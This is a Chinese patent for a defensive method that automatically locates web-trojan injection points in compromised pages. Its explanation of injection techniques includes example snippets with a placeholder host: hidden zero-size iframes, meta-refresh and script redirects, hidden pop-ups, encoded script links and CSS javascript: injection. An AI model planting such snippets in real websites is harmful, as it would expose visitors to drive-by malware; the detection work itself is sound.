一种挂马网页中网页木马挂接点自动定位方法

摘要

本发明公开了一种挂马网页中网页木马挂接点自动定位方法，属于计算机安全领域。该方法包括：a)确定挂马网页；b)获得挂马网页中的样式表；对其中的脚本按步骤c)进行脚本分析；c)获得挂马网页中的脚本；输出恶意脚本在其父网页中的位置，恶意特征包括：调用已知漏洞的对象、包含恶意代码、打开恶意网页、重定向至恶意网页、和添加恶意网页；d)获得挂马网页中的内嵌网页，对确定挂马的内嵌网页，比较其站点域名与挂马网页是否相同，若不同则输出其内嵌标签在其父网页中的位置；若相同则进行递归分析。本发明可用于计算机安全应用，包括快速定位网页木马在网页中挂接的位置，协助网站管理人员快速移除受害网页中所包含的恶意内容。

说明书

技术领域

本发明属于计算机安全领域，涉及一种基于网页内部结构解析的网页木马自动化分析技术，利用网页木马挂接的技术特点，提出一种网页木马挂接点自动识别与定位的方法。

背景技术

当前，Web浏览已经成了传播恶意程序的重要途径，网页木马的传播手段已经从以往的通过欺骗的手段诱使用户下载安装转变为攻击系统中存在的安全漏洞并自动下载和安装木马程序。越来越多的浏览器和浏览器插件的漏洞被发现，像微软的MS06-014，MS08-078，MS09-002，MS09-028漏洞，Adobe Flash和Acrobat Reader的漏洞等都是网页挂马中常用的漏洞。在2008年，IE报出31个新的漏洞，各类ActiveX插件中报告出366个漏洞，在Pwn2Own 2009，the 3^rd annual hacker contest中，Safari，Intemet Explorer 8和Firefox也都相继出现了新的zero-day攻击。2008年，Niels Provos等的研究报告[参见AllYour iFrames Point to Us，Niels Provos，Panayiotis Mavrommatis，Moheeb Rajab，FabianMonrose，17th USENIX Security Symposium，2008.]中表示，google的研究团队已经从互联网中检测到3,000,000个挂马的网页，其搜索引擎返回的用户查询结果页面中有1.3％的网页为挂马网页。

现有技术中，术语“网页挂马”(drive-by download)特指攻击者篡改具有安全漏洞的网站上的网页，在网页上部署恶意内容，试图利用网页浏览者主机上存在的浏览器及其插件的安全漏洞，攻击浏览者主机系统并自动下载和安装木马程序的行为。当用户使用浏览器浏览这些被挂马的网页时，如果系统中存在相应的漏洞，网页中包含的恶意程内容就会偷偷在用户主机下载和安装恶意软件，获取系统的控制权，进而窃取用户的私人信息，或将用户主机转变为下一步的攻击跳板等。

在网页挂马的过程中，可以将其中参与的元素划分成如下的角色：

被挂马网页：指遭到攻击者恶意篡改的网页。攻击者可能已经获该受害网站的控制权，可以直接修改这些网页的内容，也可能是通过上传CSS文件等方式，向网页中写入了恶意的攻击内容。在篡改得逞后，攻击者利用被挂马网页的流量将自己的网页木马传播开去，达到入侵网页浏览者主机的目的。

漏洞：主要分为浏览器漏洞和浏览器插件漏洞，网马的成功执行前提是浏览受害网页的用户的客户端主机上具有相应的漏洞，这样，网页中包含的脚本代码才能通过与这些漏洞交互达到入侵用户主机的目的。

攻击脚本：用于搜索客户端浏览器及其插件漏洞，实施exploit攻击用户主机，下载并执行木马的脚本程序，攻击脚本是网马攻击过程中的重要组成部分。为了提高攻击的成功率，攻击者通常会在被挂马网页上部署多套攻击脚本，来攻击不同的系统或软件漏洞。

木马程序：木马程序是攻击者试图安装在网页浏览者主机上的恶意程序，用户浏览被挂马网页时，页面中挂载的攻击脚本成功攻击客户端系统或浏览器插件等的漏洞后，会下载并执行木马程序。通常一个完整的木马程序会包含“服务器”端和“控制器”端两个部分。植入受害用户电脑的是“服务器”部分，攻击者则利用“控制器”进入运行了“服务器”的电脑。受害主机上运行了木马程序的“服务器”以后，就会有一个或几个端口被打开，使攻击者可以利用这些打开的端口获取系统控制权，进而可以任意毁坏、窃取受害用户的文件，甚至通过远程操控将受害主机变成进一步的攻击跳板。

网页木马：包含攻击脚本的网页，网马页面是攻击脚本的载体。要运行恶意攻击脚本，需要先将恶意脚本部署在一个HTML页面中，才能被浏览器加载运行。

宿主站点：宿主站点指网页木马或攻击脚本所存放的服务器，攻击者拥有这些主机的远程控制权，这些服务器可能是攻击者自己的服务器，也可能是被攻击者攻陷的主机。

目前网页挂马检测方面的研究主要集中在判断给定的网页是否安全，常采用在受控环境中动态访问待检测网页的方法，或模拟执行网页的方法来检测一个网页是否会会包含恶意行为，对于包含恶意行为的网页予以报警，阻断用户访问。这种方法主要从用户的角度出发，防止用户主机被感染。但网站挂马不仅对用户造成威胁，还会严重影响网站的声誉和网站运营者的利益，因此网站管理者需要时刻关注网站中网页的安全性，在网站被挂马后，需要快速定位网页木马所挂的位置，消除网页挂马所带来的危害。本发明提出的网页木马自动识别与定位的方法，可用于对网站进行安全检测，针对被检测确定为挂马的网页，可以快速的自动定位网页中挂接的网页木马，汇总网页中的网马挂接点的位置信息，协助网站管理人员快速移除网页中的恶意内容。

发明内容

本发明的目的在于克服现有技术中存在的问题，根据网页木马挂接的技术特点，提出一种网页挂马网页中的木马挂接点的自动识别与定位的方法，可用于快速定位网页木马在网页中挂接的位置，协助网站管理人员快速移除受害网页中所包含的恶意内容。

以下首先说明在网页中挂马的技术原理。

浏览器在浏览网页时，除了加载页面文件本身的内容之外，还会加载页面文件中链入的外部脚本、外嵌CSS文件、frame/iframe所指向的网页文件等。网页中的脚本代码，在文件加载后，会作为网页一部分直接运行，这些脚本文件可以与浏览器及其插件交互，可以向网页中写入新的网页内容，也可以打开新的网页，或将网页重新定向到新的URL。

本发明发明人经过长期的研究，将常见的挂马方式归纳如下：

1.直接插入木马脚本的网页挂马方式：将恶意脚本以script的方式插入到被挂马网页中，这种方法容易实现，但一个恶意功能，可能需要较长的恶意脚本才能实现，而且这些恶意脚本中常包含的shellcode指令具有明显的特征，直接挂接在页面中，容易被管理员发现；此外，当攻击者想要改用其他的攻击手段时，逐一修改这些被挂马网页的内容也很困难，因此，这种方法在实际网络中较少被采用。

2.内嵌网页的挂马方式：攻击者在实际挂马过程中，为了构造和替换方便，常会将木马脚本插入到某个网页，然后将这些恶意的HTML页面保存在攻击者已获取控制权限的服务器上，在需要用到的时候，以隐形的内嵌页面的方式将该页面插入到被挂马网页中，使用这种方法，在被挂马网页中常见到的信息如下：<iframesrc＝http://www.xxx.com/muma.html width＝0 height＝0></iframe>。其中的http://www.xxx.com/muma.html即为一个指向攻击者精心构造的恶意网页的URL。目前网络上常见的网页木马生成器，主要的做法就是根据攻击者提供的木马程序的地址，由生成器生成相应的包含攻击脚本的恶意HTML页面，攻击者将这些页面上传到某个网络空间，再以iframe等方式挂接到被挂马网页中。

3.网页重定向的挂马方式：通过向被挂马网页中插入网页重定向指定，将被挂马网页重定向到攻击者预备好的恶意网页。网页挂马中常用的重定向方式有设置meta标签的refresh属性，修改location.href的值和调用window.navigate()函数等方式，其使用方法如下所示。

<meta http-equiv＝″Refresh″content＝2；url＝″http://www.xxx.com/muma.html″>

location.href＝″http://www.xxx.com/muma.html″

navigate(″http://www.xxx.com/muma.html″)

4.打开新窗口的网页挂马方式：通过脚本命令被挂马网页中打开新的窗口到攻击者预备好的网页。为了隐蔽，网页挂马时常在调用时设置这些新窗口出现的位置和大小，将窗口弹出在用户看不到的位置，其使用方法如下所示.

open(“http://www.xxx.com/muma.html”，newwindow，height＝0，width＝0，top＝1000，left＝0，toolbar＝no，menubar＝no，scrollbars＝no，resizable＝no，location＝no，status＝no)

5.外链脚本文件的网页挂马方式：将攻击脚本写入script文件中，在被挂马网页中插入木马脚本的链接的挂马方式。在浏览器加载被挂马网页时，这些脚本文件也会被加载并运行。还有一种外链脚本文件挂马的方式是，在外链Script文件中向网页动态写入指向被挂马HTML的Frame/iframe等。由于iframe挂马的方式越来越为多数人所熟知，而iframe在正常的网页开发中使用的并不频繁，特别是隐形的(大小为0的)iframe更是特征明显，而相对而言，一个站点中常会引入多个外链的脚本文件，为了达到更好的隐藏的效果，攻击者逐渐开始采用外链脚本文件动态生成Frame/iframe的方式来挂马。为了提高网马的中率，攻击者还常常会挂接多个针对不同软件或系统漏洞的网页木马，即在被挂马网页中挂接多个恶意的脚本文件，或在恶意脚本中写入多个指向不同网页木马的iframe。攻击者在被挂马文件中链入脚本时常会对url进行转码以躲避针对已知恶意网站的扫描，常见的形式如下：

<script type＝″text/javascript″language＝″JavaScript″src＝″http://ff1114.2288.％6Frg″></script>

而在src属性所指向的脚本文件中的则包含了上文所述的向网页中写入网页木马链接的命令：

document.writeln(″<iframe src＝http://www.xxx.com/muma.html width＝0 height＝0></iframe>″)

通过这种方式，在浏览器加载网页后，脚本程序被加载运行，将恶意网页作为内嵌页面写入被挂马网页中；

6.CSS挂马方式：CSS是层叠样式表(Cascading Style Sheets)的英文缩写。CSS最主要的目的是将文件的结构(用HTML或其他相关语言写的)与文件的显示分隔开来。IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和JavaScript脚本关联起来，CSS属性后面可以是一段JavaScript表达式，属性的值等于Javascript表达式执行的结果，在expression中可以直接引用元素自身的属性和方法，也可以使用其他浏览器对象。此外样式表中body的background-image属性可引入script脚本，攻击者常会利用这种特性，将攻击脚本或脚本文件插入网页的样式表中。CSS挂马可采用外联样式表挂马，也可采用内部样式表挂马。

外联样式表挂马，在被挂马网页中常表现为：

<link rel＝″stylesheet″type＝″text/css″href＝″http://www.xxx.com/muma.css″/>

内联挂马的在网页中的样式常表现为：

    <style type＝″text/css″>

    body{background-image:       url(‘javascript:document.write(″<iframe    src＝

http://www.xxx.com/muma.html width＝0height＝0></iframe>″))}

    </style>

针对上述常见的挂马方式，本发明提出一种定位挂马网页中的“挂马点”的方法，这里所述的”挂马点”指在网页中引入恶意行为的内容，包括直接或间接引入恶意行为的非本站点内容，以及直接引入恶意行为的本站点内容，如：在网页中引入恶意脚本段的样式表、使用内嵌页面方式引入外站恶意网页的代码段、引入恶意行为的脚本代码段以及向网页中添加恶意网页的脚本代码段等。

本发明方法针对挂马网页进行深度递归分析，确定网页木马挂接点的特征，并在分析过程中给出挂接点在待分析网页中的位置。

具体来说，本发明方法包括：

a)确定待分析网页是否挂马：通过设定的网页木马检测方法检测用户输入的待分析网页是否挂马，并对确定挂马的挂马网页进行后续处理；如果待分析网页未被确定为挂马，则退出后续的分析过程；

b)样式表分析：获得挂马网页中的样式表；提取样式表中的脚本；按步骤c)的脚本分析方法分析所述脚本是否为恶意脚本，存在恶意脚本的样式表是网页木马挂接点；输出存在恶意脚本的样式表在其父网页中的位置；

c)脚本分析：获得挂马网页中的脚本；分析所述脚本是否具有下列恶意特征中的一种或多种：调用已知漏洞的对象、包含恶意代码、打开恶意网页、重定向至恶意网页、和添加恶意网页；若是，则所述脚本为恶意脚本，这些恶意脚本也是网页木马挂接点；输出恶意脚本在其父网页中的位置；

d)内嵌网页分析：获得挂马网页中的内嵌网页，针对其中的每一个内嵌网页逐一分析：采用步骤a)所述网页木马检测方法检测该内嵌网页是否为挂马网页，若不是，则该内嵌网页不是挂马网页，退出该内嵌网页的分析；若确定该内嵌网页挂马，则该内嵌网页为恶意网页，则继续按以下步骤进行分析：

解析挂马的内嵌网页的站点域名，判断该域名与“任务站点(即，步骤a)所述待分析网页的站点域名)”是否相同，若不属于同一个站点域名，则认为该内嵌页面为攻击者恶意挂入的网页链接，即为一个网页木马挂接点，输出其内嵌标签在其父网页中的位置；否则将该内嵌网页作为挂马网页重复步骤b)，c)，d)进行递归分析，该递归分析直到所有分析过的内嵌网页中都不再包括和任务站点同站点域的内嵌网页时停止。

上述样式表包括外部样式表和内部样式表，外部样式表通过下列方法获得：扫描挂马网页，当遇到<link>标签时，若其属性满足<rel＝″stylesheet″，type＝″text/css″>，且含有href属性，则提取href属性值指向的样式表；内部样式表通过下列方法获得：扫描挂马网页，当遇到<style>标签时，若其属性满足<type＝″text/css″>，则提取该标签内部的样式表。

上述样式表中的脚本具体可通过下列方法提取：扫描样式表，若存在“expression”字段，则提取其后最近的一对匹配的“(”与”)”之间的脚本；扫描样式表，若存在“url(‘javascript:”字串，则提取在其后与之匹配的”)”之间的脚本。

上述挂马网页中的脚本包括内部脚本和外部脚本，内部脚本通过下列方法获得：扫描挂马网页中的<script>标签，若该标签不存在src属性，则提取该标签内部的脚本；外部脚本通过下列方法获得：扫描挂马网页中的<script>标签，若该标签存在src属性，则提取src属性值指向的脚本。

特别对于外部脚本而言，进一步对src属性值进行解码，若解码后的值与原值不同，则认定所述外部脚本为恶意脚本。

和现有技术相比，本发明具有以下积极效果：

1.本发明根据常见的挂马方式提出了网页木马挂接点的概念，并给出了一种自动定位挂马网页中网页木马挂接点位置的方法，将网页木马挂接的位置细化，定位到引入恶意行为的具体位置，通过这种方法可以有效的为网站维护者提供移除网页木马所需要的恶意内容位置信息。

2.本发明可以和现有的网页检测方法结合使用，对于被判定为挂马的网页，可进一步定位其中的挂马点，通过两层验证的方法有效避免对恶意脚本的误判。此外，在进行网页检测时和可疑脚本判断时，本发明采用动静结合的方法，可以发现杀毒引擎不能发现的恶意内容，有效的定位恶意内容的挂接位置。

具体实施方式

下面结合具体实施案例对本发明方法作进一步说明。

本实施例包括下列步骤：

1.检测一个待分析网页文件(比如HTML文件)是否挂马：

a)首先使用杀毒软件扫描该网页文件的内容，若检测出包含恶意内容，则可判定该网页是挂马网页；否则继续以下步骤；

b)在受控虚拟主机蜜罐(系统中包含常见的系统和浏览器漏洞，并安装有常见的含有漏洞的第三方软件)中启动网页浏览器(比如IE)浏览该网页文件，若触发恶意行为，则可判定该网页是挂马网页。

判定为挂马网页的网页文件继续进行后续步骤以进一步自动定位木马挂接点。

需要说明的是，确定网页文件是否为挂马网页的方法不一而足，这部分内容不属于本发明方法，也不是本发明方法关注的。本发明方法只针对已经确定为挂马的网页，这样的网页也可以是他人(比如客户)提交的疑似挂马的网页，或已经通过其他方法确定挂马的网页。

2.样式表分析：

a)首先对挂马网页内容进行规范化处理，消除其中多余的空格/空行/注释行；

b)获取样式表：

-外部样式表：扫描挂马网页，当遇到<link>标签时，若其属性满足<rel＝″stylesheet″，type＝″text/css″>，且含有href属性，则可以确定此处引入了外部样式表。提取href参数的右值，即为外部样式表的URL，根据这个URL即可通过网络获取外部样式表；

-内部样式表：扫描挂马网页，当遇到<style>标签时，若其属性满足<type＝″text/css″>，则可以确定此处引入了内部样式表，获取该标签内部的样式表内容；

c)提取样式表中的脚本：

对于获得的样式表(包括外部样式表和内部样式表)，扫描样式表中是否包含“expression”字段，若存在，则其后最近的一对匹配的“(”与”)”之间的内容为一个脚本；

扫描样式表中是否包含“url(‘javascript:”字串，若存在这个字串，则在其后与之匹配的”)”之间的内容为一个javascript脚本，例如，对于形如“url(‘javascript:xxx)”的代码，其中的“xxx”是一个脚本；

d)样式表挂马分析：

对于样式表中提取的脚本，按照下列步骤3进行分析，若经分析认定该脚本为恶意脚本，则可认为该样式表为一个恶意挂马点，输出该样式表标签所在的网页链接，样式表标签出现的位置和附近位置的上下文信息记录。由此准确定位样式表中的木马挂接点。

3.脚本分析：

a)首先对挂马网页内容进行规范化处理，消除其中多余的空格/空行/注释行(当然已经经过规范化处理则不再重复处理)；

b)获取脚本：

-内部脚本：扫描挂马网页中的<script>标签，若该标签不存在src属性，则是一个内部脚本，提取标签内部的内容；

-外部脚本：若该标签存在src属性，则是一个外部脚本，根据src属性的值通过网络即可获取该外部脚本；

此处，进一步采用url解码算法对该src属性的值进行解码，若解码后的值与原值不同，则认为该src所指向的URL包含了转码，此时可直接认定该外部脚本为恶意脚本，或采用相对缓和的应对措施，比如认定为疑似恶意脚本作进一步的分析；

c)脚本挂马分析：

对于上面获得的脚本(包括内部脚本和外部脚本)，作下列分析：

-调用已知漏洞的对象：将包含已知漏洞的对象的Classid及包含漏洞的调用方法添加到可疑对象列表中，在解析脚本内容时，若这些Classid与调用方法同时在脚本内容中出现，则可认为该脚本包含了调用已知漏洞的对象的指令，则认定该脚本为恶意脚本，输出该脚本在挂马网页中的位置，由此确定木马挂接点；

-包含恶意代码：使用杀毒软件扫描脚本，若其中包含恶意代码，则认定该脚本为恶意脚本，输出该脚本在挂马网页中的位置，由此确定木马挂接点，

-打开恶意网页：扫描脚本中是否存在Open指令，若发现该指令，获取其参数内容并进行解析，其第一个参数即为要打开的网页，采用下面步骤4所述网页分析方法对该网页进行检测，若检测结果为挂马网页，则认定该脚本为恶意脚本，输出该脚本在挂马网页中的位置，由此确定木马挂接点；

-重定向至恶意网页：扫描脚本中出现的作为左值的location.href，其右值即为网页重定向的目标地址；扫描脚本中出现的navigate函数，其第一个参数也是网页重定向的目标地址。采用下面步骤4所述网页分析方法对重定向的网页进行检测，若检测结果为挂马网页，则认定该脚本为恶意脚本，输出该脚本在挂马网页中的位置，由此确定木马挂接点；

-添加恶意网页：扫描脚本中存在的Document.write指令或Document.writeln指令，检查其参数中是否包含“frame”，“iframe”等字段，若存在，解析其后面最近的src的属性值，则该脚本向网页中添加了新的内嵌网页的目标地址。采用下面步骤4所述网页分析方法对加入的网页进行检测，若检测结果为挂马网页，则认定该脚本为恶意脚本，输出该脚本在挂马网页中的位置，由此确定木马挂接点；

作为综合考虑上述多个分析方面的脚本挂马分析方法的一个实例，具体可按下列方式操作：

1)若脚本所在的网页中仅包含一段脚本，则该脚本可疑，设置此脚本的嫌疑度为3，否则设置为0；

2)使用杀毒软件扫描脚本，如该脚本中包含恶意代码，则该脚本可疑，设置此脚本的嫌疑度为5，否则设置为0；

3)若脚本标签包含src属性，即该脚本为外部脚本，则检查该标签的src属性，若src属性所指向的URL包含了转码，则该脚本可疑，设置此脚本的嫌疑度为1，否则设置为0；

4)若脚本包含对常用漏洞的对象的调用，则认为该网页可疑，设置此脚本的嫌疑度为2，否则设置为0；

5)若脚本中包含打开恶意网页/重定向至恶意网页/添加恶意网页等行为，则认为该脚本可疑，设置此脚本的嫌疑度为5，否则设置为0；

6)将以上几步分析中脚本所得的嫌疑度相加，获得该脚本的总嫌疑度，若该脚本的嫌疑度大于或等于5，则认为该脚本为恶意脚本，该脚本出现的位置为一个恶意挂马点，输出该脚本标签所在的网页链接，脚本标签出现的位置和附近位置的上下文信息；若嫌疑度介于0到5之间，则该脚本是一个可疑脚本，留待进一步分析；此外，该脚本为良性，循环进入下一个脚本的处理。

4.内嵌网页分析：

a)获取内嵌网页：

1)使用meta标签重定向指向的内嵌网页：扫描网页中的<meta>标签，若其http-equiv属性的值为″Refresh″，则其url属性的参数即为页面将要跳转的目标，获取该url所指向的网页，即为该URL通过跳转方法内嵌的网页；

2)使用frame，iframe引入的内嵌网页：扫描网页中的Frame/iframe标签，若存在src属性，则该网页中包含一个指向src属性值的内嵌网页，可通过网络根据src属性值获取这些内嵌网页。

b)分析过程：

1)采用步骤1中的方法检测该内嵌网页是否为挂马网页，如果是，则继续以下步骤，否则退出该内嵌网页的分析；

2)计算上述内嵌网页的站点域名，将其与挂马网页的站点域名相比，若域名不同，则认为该内嵌网页为攻击者恶意挂入的网页链接，是一个网页木马挂接点，输出其嵌入标签(即将内嵌网页嵌入挂马网页的标签，如meta，frame，iframe等)在其父挂马网页中的位置和上下文信息；否则按照步骤2，3，4对该网页进行进一步的递归分析，直到所有的内嵌网页中都不再包括同站点域的内嵌网页。

如上所述，本发明在综合分析网页木马的挂马机制的基础上，提出一种自动化的定位挂马网页中的恶意内容的方法。本发明发明人将本实施例方法试验性地(不向公众公开)应用于北京大学网站挂马检测系统(http://ercis.icst.pku.edu.cn/)，在面向整个教育网的公益性挂马监测及事件通知服务中进行实际应用，用于向受害网站的管理提供被挂马网页中恶意内容所挂接的位置信息。试验结果表明，本发明方法取得了很好的效果，实现了本发明的目的，具有很好的实用性和推广应用前景。